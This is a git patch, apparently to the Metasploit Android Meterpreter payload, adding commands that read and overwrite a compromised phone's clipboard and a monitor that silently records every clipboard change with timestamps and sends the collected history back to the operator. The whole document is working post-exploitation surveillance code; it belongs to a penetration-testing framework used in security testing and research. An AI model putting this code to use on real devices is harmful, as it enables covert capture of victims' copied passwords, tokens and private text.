From febbb1693345912ea5ae827842c55f8d05f6d143 Mon Sep 17 00:00:00 2001 From: Tim Date: Sat, 26 Sep 2015 21:32:56 +0100 Subject: [PATCH] clipboard_monitor basically working --- .../meterpreter/AndroidMeterpreter.java | 24 +++++ .../metasploit/meterpreter/ClipManager.java | 101 ++++++++++++++++++ .../android/clipboard_get_data.java | 31 ++++++ .../android/clipboard_monitor_dump.java | 23 ++++ .../android/clipboard_monitor_pause.java | 23 ++++ .../android/clipboard_monitor_purge.java | 23 ++++ .../android/clipboard_monitor_resume.java | 23 ++++ .../android/clipboard_monitor_start.java | 24 +++++ .../android/clipboard_monitor_stop.java | 24 +++++ .../android/clipboard_set_data.java | 25 +++++ .../com/metasploit/meterpreter/TLVType.java | 8 ++ 11 files changed, 329 insertions(+) create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/ClipManager.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_get_data.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_dump.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_pause.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_purge.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_resume.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_start.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_stop.java create mode 100644 java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java index 57de481e..838be18e 100644 --- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java @@ -6,6 +6,14 @@ import android.os.Looper; import com.metasploit.meterpreter.android.activity_start_android; import com.metasploit.meterpreter.android.check_root_android; +import com.metasploit.meterpreter.android.clipboard_get_data; +import com.metasploit.meterpreter.android.clipboard_monitor_dump; +import com.metasploit.meterpreter.android.clipboard_monitor_pause; +import com.metasploit.meterpreter.android.clipboard_monitor_purge; +import com.metasploit.meterpreter.android.clipboard_monitor_resume; +import com.metasploit.meterpreter.android.clipboard_monitor_start; +import com.metasploit.meterpreter.android.clipboard_monitor_stop; +import com.metasploit.meterpreter.android.clipboard_set_data; import com.metasploit.meterpreter.android.dump_calllog_android; import com.metasploit.meterpreter.android.dump_contacts_android; import com.metasploit.meterpreter.android.dump_sms_android; @@ -59,6 +67,7 @@ public class AndroidMeterpreter extends Meterpreter { private static Context context; private final IntervalCollectionManager intervalCollectionManager; + private ClipManager clipManager; private void findContext() throws Exception { Class activityThreadClass; @@ -97,6 +106,13 @@ public class AndroidMeterpreter extends Meterpreter { return this.intervalCollectionManager; } + public synchronized ClipManager getClipManager() { + if (clipManager == null) { + clipManager = ClipManager.create(context); + } + return clipManager; + } + public static Context getContext() { return context; } @@ -167,6 +183,14 @@ public class AndroidMeterpreter extends Meterpreter { mgr.registerCommand("set_audio_mode", set_audio_mode_android.class); mgr.registerCommand("sqlite_query", sqlite_query_android.class); mgr.registerCommand("set_wallpaper", set_wallpaper_android.class); + mgr.registerCommand("extapi_clipboard_get_data", clipboard_get_data.class); + mgr.registerCommand("extapi_clipboard_set_data", clipboard_set_data.class); + mgr.registerCommand("extapi_clipboard_monitor_dump", clipboard_monitor_dump.class); + mgr.registerCommand("extapi_clipboard_monitor_pause", clipboard_monitor_pause.class); + mgr.registerCommand("extapi_clipboard_monitor_purge", clipboard_monitor_purge.class); + mgr.registerCommand("extapi_clipboard_monitor_resume", clipboard_monitor_resume.class); + mgr.registerCommand("extapi_clipboard_monitor_start", clipboard_monitor_start.class); + mgr.registerCommand("extapi_clipboard_monitor_stop", clipboard_monitor_stop.class); } return getCommandManager().getNewCommands(); } diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/ClipManager.java b/java/androidpayload/library/src/com/metasploit/meterpreter/ClipManager.java new file mode 100644 index 00000000..eb843f66 --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/ClipManager.java @@ -0,0 +1,101 @@ +package com.metasploit.meterpreter; + +import android.content.ClipData; +import android.content.ClipboardManager; +import android.content.Context; +import android.os.Build; +import android.os.Handler; +import android.os.Looper; +import android.text.format.DateFormat; + +import java.io.IOException; +import java.util.Date; +import java.util.LinkedList; +import java.util.List; + +public class ClipManager implements ClipboardManager.OnPrimaryClipChangedListener { + + private final Object waiter = new Object(); + + private final Context context; + private ClipboardManager clipboardManager; + private final List clipboardHistory = new LinkedList(); + private class ClipEntry { + long timestamp; + String text; + } + + private ClipManager(Context contextInput) { + this.context = contextInput; + // Switch to the UI thread to get the ClipboardManager + final Handler handler = new Handler(Looper.getMainLooper()); + handler.post(new Runnable() { + public void run() { + synchronized (waiter) { + clipboardManager = (ClipboardManager) context.getSystemService(Context.CLIPBOARD_SERVICE); + waiter.notify(); + } + } + }); + synchronized (waiter) { + try { + if (clipboardManager == null) { + waiter.wait(100); + } + } catch (InterruptedException e) { + e.printStackTrace(); + } + } + } + + public static ClipManager create(Context context) { + if (Build.VERSION.SDK_INT < Build.VERSION_CODES.HONEYCOMB) { + return null; + } + return new ClipManager(context); + } + + + public void setText(String text) { + clipboardManager.setPrimaryClip(ClipData.newPlainText("", text)); + } + + public String getText() { + if (!clipboardManager.hasPrimaryClip()) { + return "(null - clipboard was cleared)"; + } + + ClipData primaryClip = clipboardManager.getPrimaryClip(); + ClipData.Item item = primaryClip.getItemAt(0); + return item.coerceToText(context).toString(); + } + + public void stop() { + clipboardManager.removePrimaryClipChangedListener(this); + } + + public void start() { + clipboardManager.addPrimaryClipChangedListener(this); + } + + @Override + public void onPrimaryClipChanged() { + ClipEntry clipEntry = new ClipEntry(); + clipEntry.timestamp = System.currentTimeMillis(); + clipEntry.text = getText(); + clipboardHistory.add(clipEntry); + } + + public void purge() { + clipboardHistory.clear(); + } + + public void dump(TLVPacket response) throws IOException { + for (ClipEntry clipText : clipboardHistory) { + TLVPacket pckt = new TLVPacket(); + pckt.addOverflow(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP, new Date(clipText.timestamp).toString()); + pckt.addOverflow(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, clipText.text); + response.addOverflow(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, pckt); + } + } +} diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_get_data.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_get_data.java new file mode 100644 index 00000000..edf9372a --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_get_data.java @@ -0,0 +1,31 @@ + +package com.metasploit.meterpreter.android; + +import com.metasploit.meterpreter.AndroidMeterpreter; +import com.metasploit.meterpreter.ClipManager; +import com.metasploit.meterpreter.Meterpreter; +import com.metasploit.meterpreter.TLVPacket; +import com.metasploit.meterpreter.TLVType; +import com.metasploit.meterpreter.command.Command; + +public class clipboard_get_data implements Command { + + @Override + public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception { + AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter; + ClipManager clipManager = androidMeterpreter.getClipManager(); + if (clipManager == null) { + return ERROR_FAILURE; + } + + String text = clipManager.getText(); + if (text != null) { + TLVPacket pckt = new TLVPacket(); + pckt.add(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, text); + response.addOverflow(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, pckt); + } + return ERROR_SUCCESS; + + } +} + diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_dump.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_dump.java new file mode 100644 index 00000000..c0cf55c5 --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_dump.java @@ -0,0 +1,23 @@ + +package com.metasploit.meterpreter.android; + +import com.metasploit.meterpreter.AndroidMeterpreter; +import com.metasploit.meterpreter.ClipManager; +import com.metasploit.meterpreter.Meterpreter; +import com.metasploit.meterpreter.TLVPacket; +import com.metasploit.meterpreter.command.Command; + +public class clipboard_monitor_dump implements Command { + + @Override + public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception { + AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter; + ClipManager clipManager = androidMeterpreter.getClipManager(); + if (clipManager == null) { + return ERROR_FAILURE; + } + clipManager.dump(response); + return ERROR_SUCCESS; + } +} + diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_pause.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_pause.java new file mode 100644 index 00000000..5f738714 --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_pause.java @@ -0,0 +1,23 @@ + +package com.metasploit.meterpreter.android; + +import com.metasploit.meterpreter.AndroidMeterpreter; +import com.metasploit.meterpreter.ClipManager; +import com.metasploit.meterpreter.Meterpreter; +import com.metasploit.meterpreter.TLVPacket; +import com.metasploit.meterpreter.command.Command; + +public class clipboard_monitor_pause implements Command { + + @Override + public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception { + AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter; + ClipManager clipManager = androidMeterpreter.getClipManager(); + if (clipManager == null) { + return ERROR_FAILURE; + } + clipManager.stop(); + return ERROR_SUCCESS; + } +} + diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_purge.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_purge.java new file mode 100644 index 00000000..2fef19cc --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_purge.java @@ -0,0 +1,23 @@ + +package com.metasploit.meterpreter.android; + +import com.metasploit.meterpreter.AndroidMeterpreter; +import com.metasploit.meterpreter.ClipManager; +import com.metasploit.meterpreter.Meterpreter; +import com.metasploit.meterpreter.TLVPacket; +import com.metasploit.meterpreter.command.Command; + +public class clipboard_monitor_purge implements Command { + + @Override + public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception { + AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter; + ClipManager clipManager = androidMeterpreter.getClipManager(); + if (clipManager == null) { + return ERROR_FAILURE; + } + clipManager.purge(); + return ERROR_SUCCESS; + } +} + diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_resume.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_resume.java new file mode 100644 index 00000000..b9c4b1f0 --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_resume.java @@ -0,0 +1,23 @@ + +package com.metasploit.meterpreter.android; + +import com.metasploit.meterpreter.AndroidMeterpreter; +import com.metasploit.meterpreter.ClipManager; +import com.metasploit.meterpreter.Meterpreter; +import com.metasploit.meterpreter.TLVPacket; +import com.metasploit.meterpreter.command.Command; + +public class clipboard_monitor_resume implements Command { + + @Override + public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception { + AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter; + ClipManager clipManager = androidMeterpreter.getClipManager(); + if (clipManager == null) { + return ERROR_FAILURE; + } + clipManager.start(); + return ERROR_SUCCESS; + } +} + diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_start.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_start.java new file mode 100644 index 00000000..c181240b --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_start.java @@ -0,0 +1,24 @@ + +package com.metasploit.meterpreter.android; + +import com.metasploit.meterpreter.AndroidMeterpreter; +import com.metasploit.meterpreter.ClipManager; +import com.metasploit.meterpreter.Meterpreter; +import com.metasploit.meterpreter.TLVPacket; +import com.metasploit.meterpreter.command.Command; + +public class clipboard_monitor_start implements Command { + + @Override + public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception { + AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter; + ClipManager clipManager = androidMeterpreter.getClipManager(); + if (clipManager == null) { + return ERROR_FAILURE; + } + clipManager.purge(); + clipManager.start(); + return ERROR_SUCCESS; + } +} + diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_stop.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_stop.java new file mode 100644 index 00000000..d8d3f964 --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_monitor_stop.java @@ -0,0 +1,24 @@ + +package com.metasploit.meterpreter.android; + +import com.metasploit.meterpreter.AndroidMeterpreter; +import com.metasploit.meterpreter.ClipManager; +import com.metasploit.meterpreter.Meterpreter; +import com.metasploit.meterpreter.TLVPacket; +import com.metasploit.meterpreter.command.Command; + +public class clipboard_monitor_stop implements Command { + + @Override + public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception { + AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter; + ClipManager clipManager = androidMeterpreter.getClipManager(); + if (clipManager == null) { + return ERROR_FAILURE; + } + clipManager.stop(); + clipManager.dump(response); + return ERROR_SUCCESS; + } +} + diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java new file mode 100644 index 00000000..92633522 --- /dev/null +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java @@ -0,0 +1,25 @@ + +package com.metasploit.meterpreter.android; + +import com.metasploit.meterpreter.AndroidMeterpreter; +import com.metasploit.meterpreter.ClipManager; +import com.metasploit.meterpreter.Meterpreter; +import com.metasploit.meterpreter.TLVPacket; +import com.metasploit.meterpreter.TLVType; +import com.metasploit.meterpreter.command.Command; +import com.metasploit.stage.PayloadTrustManager; + +public class clipboard_set_data implements Command { + + @Override + public int execute(Meterpreter meterpreter, TLVPacket request, final TLVPacket response) throws Exception { + AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter)meterpreter; + ClipManager clipManager = androidMeterpreter.getClipManager(); + if (clipManager == null) { + return ERROR_FAILURE; + } + clipManager.setText(request.getStringValue(TLVType.TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)); + return ERROR_SUCCESS; + } +} + diff --git a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java index 14516e73..a972b19c 100644 --- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java +++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java @@ -196,4 +196,12 @@ public interface TLVType { public static final int TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER = TLVPacket.TLV_META_TYPE_STRING | 3010; public static final int TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH = TLVPacket.TLV_META_TYPE_UINT | 3011; public static final int TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLVPacket.TLV_META_TYPE_STRING | 3012; + + int TLV_TYPE_EXTENSION_EXTAPI = 0; + int TLV_EXTENSIONS = 20000; + int TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLVPacket.TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35); + int TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP = TLVPacket.TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 38); + int TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT = TLVPacket.TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 39); + int TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT = TLVPacket.TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 40); + }